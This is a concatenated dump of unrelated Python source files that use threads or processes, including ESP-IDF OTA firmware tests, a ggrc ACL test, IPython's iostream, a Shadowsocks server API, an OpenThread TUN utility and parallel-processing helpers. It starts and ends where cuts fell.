steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Port to which the request should be redirecetd
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = Thread(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
thread2.close()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_8Mflash_Ethernet')
def test_examples_protocol_advanced_https_ota_example_anti_rollback(env, extra_data):
"""
Working of OTA when anti_rollback is enabled and security version of new image is less than current one.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with lower security version
3. Fetch OTA image over HTTPS
4. Check working of anti_rollback feature
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='anti_rollback')
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Modified firmware image to lower security version in its header. This is to enable negative test case
anti_rollback_bin_name = 'advanced_https_ota_lower_sec_version.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
file_size = os.path.getsize(binary_file)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, anti_rollback_bin_name), 'wb+')
fo.write(f.read(file_size))
# Change security_version to 0 for negative test case
fo.seek(36)
fo.write(b'\x00')
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, anti_rollback_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
# Positive Case
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use originally generated image with secure_version=1
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect(re.compile(r' eth ip: ([^,]+),'), timeout=30)
dut1.expect('App is valid, rollback cancelled successfully', 30)
# Negative Case
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use modified image with secure_version=0
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name)
dut1.expect('New firmware security version is less than eFuse programmed, 0 < 1', timeout=30)
os.remove(anti_rollback_bin_name)
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
test_examples_protocol_advanced_https_ota_example_anti_rollback()
|
test_acl_propagation.py
|
# Copyright (C) 2018 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test acl role propagation on workflows."""
# pylint: disable=invalid-name
import datetime
from copy import deepcopy
from threading import Thread
from freezegun import freeze_time
from ggrc import db
from ggrc_workflows.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.models import factories
from integration.ggrc_workflows.generator import WorkflowsGenerator
class TestWorkflowAclPropagation(TestCase):
"""Test acl role propagation on workflows."""
def setUp(self):
super(TestWorkflowAclPropagation, self).setUp()
self.generator = WorkflowsGenerator()
with factories.single_commit():
self.people_ids = [
factories.PersonFactory(
name="user {}".format(i),
email="user{}@example.com".format(i),
).id
for i in range(10)
]
acr = all_models.AccessControlRole
self.acr_name_map = dict(db.session.query(
acr.name,
acr.id,
).filter(
acr.object_type == all_models.Workflow.__name__,
))
self.weekly_wf = {
"title": "weekly thingy",
"description": "start this many a time",
"access_control_list": [
{
"ac_role_id": self.acr_name_map["Admin"],
"person": {"type": "Person", "id": self.people_ids[i]},
}
for i in range(5)
],
"unit": "week",
"repeat_every": 1,
"task_groups": [{
"title": "weekly task group",
"task_group_tasks": [
{
"title": "weekly task {}".format(i),
"start_date": datetime.date(2016, 6, 10),
"end_date": datetime.date(2016, 6, 13),
}
for i in range(3)
]},
]
}
def test_async_role_propagation(self):
"""Test asynchronous acl propagations.
This test just ensures that simultaneous updates to a single workflow work.
The test checks this by first creating a workflow with first 5 out of 10
people mapped to that workflow. Then we trigger a bunch of updates to
workflow people while only using the last 5 people.
In the end if the procedure does not fail or return an error on any step,
we should see only a few of the last 5 people and none of the first 5
people still mapped to the workflow.
Note: This test does not check for correct setting of acl roles, but only
that those roles that are set are correctly propagated and that propagation
does not create any deadlocks.
Since we have a bug with setting ACLs the result of this test will be that
same people can have the same role on a workflow multiple times and each of
those will have correct role propagation.
"""
number_of_threads = 10
def change_assignees(workflow, assignees):
"""Change workflow assignees."""
self.generator.api.put(workflow, {
"access_control_list": [
{
"ac_role_id": self.acr_name_map["Admin"],
"person": {"type": "Person", "id": self.people_ids[i]},
}
for i in assignees
],
})
updated_wf = deepcopy(self.weekly_wf)
with freeze_time("2016-6-10 13:00:00"): # Friday, 6/10/2016
_, wf = self.generator.generate_workflow(updated_wf)
self.generator.activate_workflow(wf)
threads = []
for i in range(number_of_threads):
assignees = [i % 4 + 5, i % 4 + 6]
threads.append(Thread(target=change_assignees, args=(wf, assignees)))
for t in threads:
t.start()
for t in threads:
t.join()
acl = all_models.AccessControlList
workflow_role_count = acl.query.filter(
acl.object_type == all_models.Workflow.__name__
).count()
propagated_role_count = acl.query.filter(
acl.parent_id.isnot(None)
).count()
# 1 cycle
# 1 cycle task group
# 3 cycle tasks
# 1 task group
# 3 tasks
# *2 is for all relationships that are created
number_of_wf_objects = (1 + 1 + 3 + 1 + 3) * 2
self.assertEqual(
workflow_role_count * number_of_wf_objects,
propagated_role_count
)
|
parse.py
|
#!/usr/bin/env python
# coding=utf-8
# Stan 2018-06-05
from __future__ import (division, absolute_import,
print_function, unicode_literals)
import os
from itertools import islice
from threading import Thread
from sqlalchemy import select, and_
from .. import *
from ..core.data_funcs import filter_match
from .models import Dir, File, Node, Parser, Parse
# from .proceed_dropbox import download_file_dropbox
# from .proceed_google import download_file_google
# from .proceed.yandex import yandex_download
if PY2:
from Queue import Queue, Empty
else:
from queue import Queue, Empty
RUNTIME_ERROR = -100
q = Queue(maxsize=0)
def chunk(it, size):
it = iter(it)
return iter(lambda: tuple(islice(it, size)), ())
def do_stuff(q, options, recorder, parse):
while True:
filename = q.get()
do_stuff_row(filename, options, recorder, parse)
q.task_done()
def do_stuff_row(filename, options, recorder, parse):
try:
er = recorder.func(filename, options, recorder, parse.id)
parse.status = er
except Exception as e:
parse.status = RUNTIME_ERROR
recorder.exception("Error file parsing",
target=parse.file.name, parse_id=parse.id, once="do_stuff_1")
recorder.commit()
# delete_file(filename)
def parse_files(filename, filetype, options, recorder):
provider = options.get('provider', 'filesystem')
# if provider == 'yandex':
# download_file = yandex_download
# else: # filesystem
download_file = None
recorder.time
if filetype == 1:
dirname = os.path.dirname(filename)
basename = os.path.basename(filename)
# Node должен быть создан
FILE, NODE = recorder.query(File, Node).filter_by(name=basename, state=1).\
join(File.node).join(File.dir).filter_by(name=dirname).first()
parse_file(FILE, NODE, options, recorder, download_file)
else:
dirs_filter = options.get('dirs_filter')
exclude_dirs_filter = options.get('exclude_dirs_filter')
dir_depth = options.get('dir_depth')
files_filter = options.get('files_filter')
limit = int(options.get('limit', 1000))
threads = int(options.get('threads', 0))
if threads:
recorder.info("Parsing with {0} threads...".format(threads))
for i in range(threads):
worker = Thread(target=do_stuff, args=(q, options, recorder, parse))
worker.setDaemon(True)
worker.start()
empty = False
while not empty:
rows = recorder.execute(sql.format(SLICE.id, limit))
rows = [i for i in rows]
empty = True
for bundle in chunk(rows, threads):
for row in bundle:
empty = False
q.put(row)
q.join()
if not empty:
recorder.debug("Processed {0} files".format(len(bundle)))
else:
recorder.info("Parsing without threads...")
rows = True
offset = 0
while rows:
scoped_dirs_expr = (
Dir.provider == recorder.provider,
Dir.name.like("{0}%".format(filename)),
)
scoped_files_expr = (
File._dir_id.in_(select([Dir.id]).where(and_(*scoped_dirs_expr))),
)
rows = recorder.query(File, Node).filter(
File.state==1,
*scoped_files_expr
).join(File.node, isouter=True).slice(offset, offset+limit).all()
offset += limit
for FILE, NODE in rows:
if FILE.type == 1 and filter_match(FILE.name, files_filter):
parse_file(FILE, NODE, options, recorder, download_file)
if rows:
recorder.debug("Processed {0} files".format(len(rows)))
recorder.info("Processing time: {0}".format(recorder.time))
def parse_file(FILE, NODE, options, recorder, download_file):
provider = options.get('provider', 'filesystem')
if provider == 'filesystem':
parse = recorder.query(Parse).filter_by(_parser_id=recorder.parser.id, _file_id=FILE.id).first()
_link = dict(file=FILE, node=NODE)
else:
if NODE is None:
recorder.warning("Node missed: '{0}'".format(FILE.name))
return
parse = recorder.query(Parse).filter_by(_parser_id=recorder.parser.id, _node_id=NODE.id).first()
_link = dict(file=FILE, node=NODE)
if parse and parse.status > RUNTIME_ERROR:
return
if not parse:
parse = Parse(parser=recorder.parser, **_link)
recorder.add(parse)
recorder.commit()
filename = "{0}/{1}".format(FILE.dir.name, FILE.name)
recorder.debug(filename, timer=('filename', 5))
if download_file:
tmp_name = "tmp/{0}".format(FILE.name)
try:
download_file(filename, tmp_name, recorder)
except Exception as e:
recorder.exception("Error file downloading",
target=FILE.name, parse_id=parse.id, once="download_file_1")
return
else:
tmp_name = filename
do_stuff_row(tmp_name, options, recorder, parse)
|
multi_processing.py
|
from multiprocessing import Process
import os
# 子进程要执行的代码
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',))
print('Child process will start.')
p.start()
p.join()
print('Child process end.')
|
iostream.py
|
# coding: utf-8
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import atexit
from binascii import b2a_hex
from collections import deque
try:
from importlib import lock_held as import_lock_held
except ImportError:
from imp import lock_held as import_lock_held
import os
import sys
import threading
import warnings
from io import StringIO, TextIOBase
import zmq
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
from ipython_genutils import py3compat
from ipython_genutils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket: zmq.PUB Socket
the socket on which messages will be sent.
pipe: bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop(make_current=False)
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events = deque()
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.make_current()
self.io_loop.start()
self.io_loop.close(all_fds=True)
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode('ascii')
iface = self._event_interface = 'inproc://%s' % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe
Content of the message is ignored.
Whenever *an* event arrives on the event stream,
*all* waiting events are processed in order.
"""
# freeze event count so new writes don't extend the queue
# while we are processing
n_events = len(self._events)
for i in range(n_events):
event_f = self._events.popleft()
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
"\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
if hasattr(self._local, 'event_pipe'):
self._local.event_pipe.close()
def close(self):
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
self._events.append(f)
# wake event thread (message content is ignored)
self._event_pipe.send(b'')
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda : self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket(object):
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith('__') and attr.endswith('__'):
# don't wrap magic methods
super(BackgroundSocket, self).__getattr__(attr)
if hasattr(self.io_thread.socket, attr):
warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
return getattr(self.io_thread.socket, attr)
super(BackgroundSocket, self).__getattr__(attr)
def __setattr__(self, attr, value):
if attr == 'io_thread' or (attr.startswith('__' and attr.endswith('__'))):
super(BackgroundSocket, self).__setattr__(attr, value)
else:
warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# timeout for flush to avoid infinite hang
# in case of misbehavior
flush_timeout = 10
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic = None
encoding = 'UTF-8'
def __init__(self, session, pub_thread, name, pipe=None):
if pipe is not None:
warnings.warn("pipe argument to OutStream is deprecated and ignored",
DeprecationWarning)
# This is necessary for compatibility with Python built-in streams
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn("OutStream should be created with IOPubThread, not %r" % pub_thread,
DeprecationWarning, stacklevel=2)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b'stream.' + py3compat.cast_bytes(name)
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._io_loop = pub_thread.io_loop
self._new_buffer()
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if self.pub_thread.thread.is_alive():
# request flush on the background thread
self.pub_thread.schedule(self._flush)
# wait for flush to actually get through, if we can.
# waiting across threads during import can cause deadlocks
# so only wait if import lock is not held
if not import_lock_held():
evt = threading.Event()
self.pub_thread.schedule(evt.set)
# and give a timeout to avoid
if not evt.wait(self.flush_timeout):
# write directly to __stderr__ instead of warning because
# if this is happening sys.stderr may be the problem.
print("IOStream.flush timed out", file=sys.__stderr__)
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {u'name':self.name, u'text':data}
self.session.send(self.pub_thread, u'stream', content=content,
parent=self.parent_header, ident=self.topic)
def write(self, string):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
# Make sure that we're handling unicode
if not isinstance(string, unicode_type):
string = string.decode(self.encoding, 'replace')
is_child = (not self._is_master_process())
# only touch the buffer in the IO thread to avoid races
self.pub_thread.schedule(lambda : self._buffer.write(string))
if is_child:
# newlines imply flush in subprocesses
# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if '\n' in string:
self.flush()
else:
self._schedule_flush()
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
for string in sequence:
self.write(string)
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data.
This should only be called in the IO thread.
"""
data = u''
if self._buffer is not None:
buf = self._buffer
self._new_buffer()
data = buf.getvalue()
buf.close()
return data
def _new_buffer(self):
self._buffer = StringIO()
|
recorder.py
|
import os
from kivy.uix.boxlayout import BoxLayout
from kivy.lang import Builder
from kivy.properties import BooleanProperty, NumericProperty, StringProperty, ListProperty, OptionProperty, ObjectProperty
import threading
import time
from collections import deque
from midistream.helpers import midi_command_increase_channel, midi_program_change
Builder.load_file(os.path.join(os.path.dirname(__file__), 'recorder.kv'))
class Recorder(BoxLayout):
instrument = ObjectProperty()
reproducer = ObjectProperty()
state = StringProperty("")
position = NumericProperty(0)
rec_start_time = NumericProperty(0)
rec_prev_time = NumericProperty(0)
def __init__(self, *args, **kwargs):
super(Recorder, self).__init__(*args, **kwargs)
self.commands = deque()
self.session = 0
def on_instrument(self, instance, value):
self.instrument.bind(command=self.record_command)
def toggle_recording(self, *args):
self.session += 1
if self.state == 'rec':
self.stop_recording()
elif self.state == 'play':
self.stop_playing()
self.state = 'rec' if self.state != 'rec' else ''
if self.state == 'rec':
self.commands.clear()
self.rec_start_time = self.rec_prev_time = time.time()
self.program = self.instrument.program
def toggle_play(self, *args):
self.session += 1
if self.state == 'rec':
self.stop_recording()
self.state = 'play' if self.state != 'play' else ''
if self.state == 'play' and self.commands:
self.position = 0
self.play_prev_time = time.time()
player = threading.Thread(target=self.play_loop)
player.daemon = True
player.start()
elif self.state != 'play':
self.stop_playing()
def stop_recording(self):
if self.reproducer:
# record program change
cmd = midi_program_change(self.program,
self.instrument.channel)
else:
cmd = None # record pause
self.record_command(self.reproducer, cmd)
def stop_playing(self):
reproducer = self.reproducer or self.instrument
for note in self.instrument.played_notes:
reproducer.note_off(note)
def play_loop(self):
session = self.session
commands = self.commands_iter()
reproducer = self.reproducer or self.instrument
reproducer.program = self.program
while self.state == 'play' and self.session == session:
command, t = next(commands)
if t:
time.sleep(t)
if self.state == 'play' and self.session == session:
if command:
reproducer.command = command
self.position += 1
def commands_iter(self):
while True:
for command, t in self.commands:
yield command, t
def get_command(self, position=None):
count = len(self.commands)
if position is None:
position = self.position
if count:
command, t = self.commands[self.position % count]
return command, t
def record_command(self, instrument, command):
if self.state == 'rec':
current = time.time()
if self.commands:
t = current - self.rec_prev_time
else:
t = 0
self.rec_prev_time = current
self.rec_prev_time = current
if self.reproducer != self.instrument:
inc = self.reproducer.channel - self.instrument.channel
command = midi_command_increase_channel(command, inc)
self.commands.append((command, t))
|
api.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
from multiprocessing import Process
from shadowsocks import asyncdns, tcprelay, udprelay, eventloop, shell
# 对外提供API服务代码
# 具体要求是 当接收到 一个uid和相关配置后,启动监听和事件
__all__ = ['start_server', 'stop_server', 'is_server_started']
p = dict()
def call_back(port, data_len):
print(port, data_len)
def start_server(uid, port, password, crypt_name):
def handler():
config = {
"password": password,
"method": crypt_name,
"server_port": port,
"timeout": 60,
"server": "::",
"fast_open": False
}
try:
loop = eventloop.EventLoop()
dns_resolver = asyncdns.DNSResolver()
tcp_server = tcprelay.TCPRelay(config, dns_resolver, False, stat_callback=call_back)
udp_server = udprelay.UDPRelay(config, dns_resolver, False)
dns_resolver.add_to_loop(loop)
tcp_server.add_to_loop(loop)
udp_server.add_to_loop(loop)
loop.run()
except IOError as e:
if e.errno == 98:
sys.exit(1)
except Exception as e:
shell.print_exception(e)
sys.exit(1)
if is_server_started(uid):
stop_server(uid)
prs = Process(target=handler, name=uid)
prs.daemon = True
prs.start()
p[uid] = prs
return prs.pid
def is_server_started(uid):
if uid in p.keys() and p[uid].is_alive():
return True
return False
def stop_server(uid):
if uid in p.keys():
os.kill(p[uid].pid, 4)
|
tun.py
|
#
# Copyright (c) 2016-2017, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Utility class for creating TUN network interfaces on Linux and OSX. """
import os
import sys
import struct
import logging
import threading
import traceback
import subprocess
if sys.platform == "linux" or sys.platform == "linux2":
import fcntl
from select import select
import spinel.util as util
import spinel.config as CONFIG
IFF_TUN = 0x0001
IFF_TAP = 0x0002
IFF_NO_PI = 0x1000
IFF_TUNSETIFF = 0x400454ca
IFF_TUNSETOWNER = IFF_TUNSETIFF + 2
class TunInterface(object):
""" Utility class for creating a TUN network interface. """
def __init__(self, identifier):
self.identifier = identifier
self.ifname = "tun" + str(self.identifier)
self.tun = None
self.fd = None
platform = sys.platform
if platform == "linux" or platform == "linux2":
self.__init_linux()
elif platform == "darwin":
self.__init_osx()
else:
raise RuntimeError("Platform \"{}\" is not supported.".format(platform))
self.ifconfig("up")
#self.ifconfig("inet6 add fd00::1/64")
self.__start_tun_thread()
def __init_osx(self):
CONFIG.LOGGER.info("TUN: Starting osx " + self.ifname)
filename = "/dev/" + self.ifname
self.tun = os.open(filename, os.O_RDWR)
self.fd = self.tun
# trick osx to auto-assign a link local address
self.addr_add("fe80::1")
self.addr_del("fe80::1")
def __init_linux(self):
CONFIG.LOGGER.info("TUN: Starting linux " + self.ifname)
self.tun = open("/dev/net/tun", "r+b")
self.fd = self.tun.fileno()
ifr = struct.pack("16sH", self.ifname, IFF_TUN | IFF_NO_PI)
fcntl.ioctl(self.tun, IFF_TUNSETIFF, ifr) # Name interface tun#
fcntl.ioctl(self.tun, IFF_TUNSETOWNER, 1000) # Allow non-sudo access
def close(self):
""" Close this tunnel interface. """
if self.tun:
os.close(self.fd)
self.fd = None
self.tun = None
@classmethod
def command(cls, cmd):
""" Utility to make a system call. """
subprocess.check_call(cmd, shell=True)
def ifconfig(self, args):
""" Bring interface up and/or assign addresses. """
self.command('ifconfig ' + self.ifname + ' ' + args)
def ping6(self, args):
""" Ping an address. """
cmd = 'ping6 ' + args
print(cmd)
self.command(cmd)
def addr_add(self, addr):
""" Add the given IPv6 address to the tunnel interface. """
self.ifconfig('inet6 add ' + addr)
def addr_del(self, addr):
""" Delete the given IPv6 address from the tunnel interface. """
platform = sys.platform
if platform == "linux" or platform == "linux2":
self.ifconfig('inet6 del ' + addr)
elif platform == "darwin":
self.ifconfig('inet6 delete ' + addr)
def write(self, packet):
#global gWpanApi
#gWpanApi.ip_send(packet)
# os.write(self.fd, packet) # Loop back
if CONFIG.DEBUG_TUN:
CONFIG.LOGGER.debug("\nTUN: TX (" + str(len(packet)) +
") " + util.hexify_str(packet))
def __run_tun_thread(self):
while self.fd:
try:
ready_fd = select([self.fd], [], [])[0][0]
if ready_fd == self.fd:
packet = os.read(self.fd, 4000)
if CONFIG.DEBUG_TUN:
CONFIG.LOGGER.debug("\nTUN: RX (" + str(len(packet)) + ") " +
util.hexify_str(packet))
self.write(packet)
except:
traceback.print_exc()
break
CONFIG.LOGGER.info("TUN: exiting")
if self.fd:
os.close(self.fd)
self.fd = None
def __start_tun_thread(self):
"""Start reader thread"""
self._reader_alive = True
self.receiver_thread = threading.Thread(target=self.__run_tun_thread)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
|
parallel.py
|
"""Utility code to execute code in parallel."""
from __future__ import absolute_import
from __future__ import print_function
import Queue
import threading
import time
from multiprocessing import cpu_count
from typing import Any, Callable, List
def parallel_process(items, func):
# type: (List[Any], Callable[[Any], bool]) -> bool
"""Run a set of work items to completion and wait."""
try:
cpus = cpu_count()
except NotImplementedError:
cpus = 1
task_queue = Queue.Queue() # type: Queue.Queue
# Use a list so that worker function will capture this variable
pp_event = threading.Event()
pp_result = [True]
pp_lock = threading.Lock()
def worker():
# type: () -> None
"""Worker thread to process work items in parallel."""
while not pp_event.is_set():
try:
item = task_queue.get_nowait()
except Queue.Empty:
# if the queue is empty, exit the worker thread
pp_event.set()
return
try:
ret = func(item)
finally:
# Tell the queue we finished with the item
task_queue.task_done()
# Return early if we fail, and signal we are done
if not ret:
with pp_lock:
pp_result[0] = False
pp_event.set()
return
# Enqueue all the work we want to process
for item in items:
task_queue.put(item)
# Process all the work
threads = []
for _ in range(cpus):
thread = threading.Thread(target=worker)
thread.daemon = True
thread.start()
threads.append(thread)
# Wait for the threads to finish
# Loop with a timeout so that we can process Ctrl-C interrupts
while not pp_event.wait(1):
time.sleep(1)
for thread in threads:
thread.join()
return pp_result[0]
|
commands.py
|
# coding: utf-8
#
# commands.py
# Part of SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Ryan Hileman and Aparajita Fishman
#
# Project: https://github.com/SublimeLinter/SublimeLinter3
# License: MIT
#
"""This module implements the Sublime Text commands provided by SublimeLinter."""
import datetime
from fnmatch import fnmatch
from glob import glob
import json
import os
import re
import shutil
import subprocess
import tempfile
from textwrap import TextWrapper
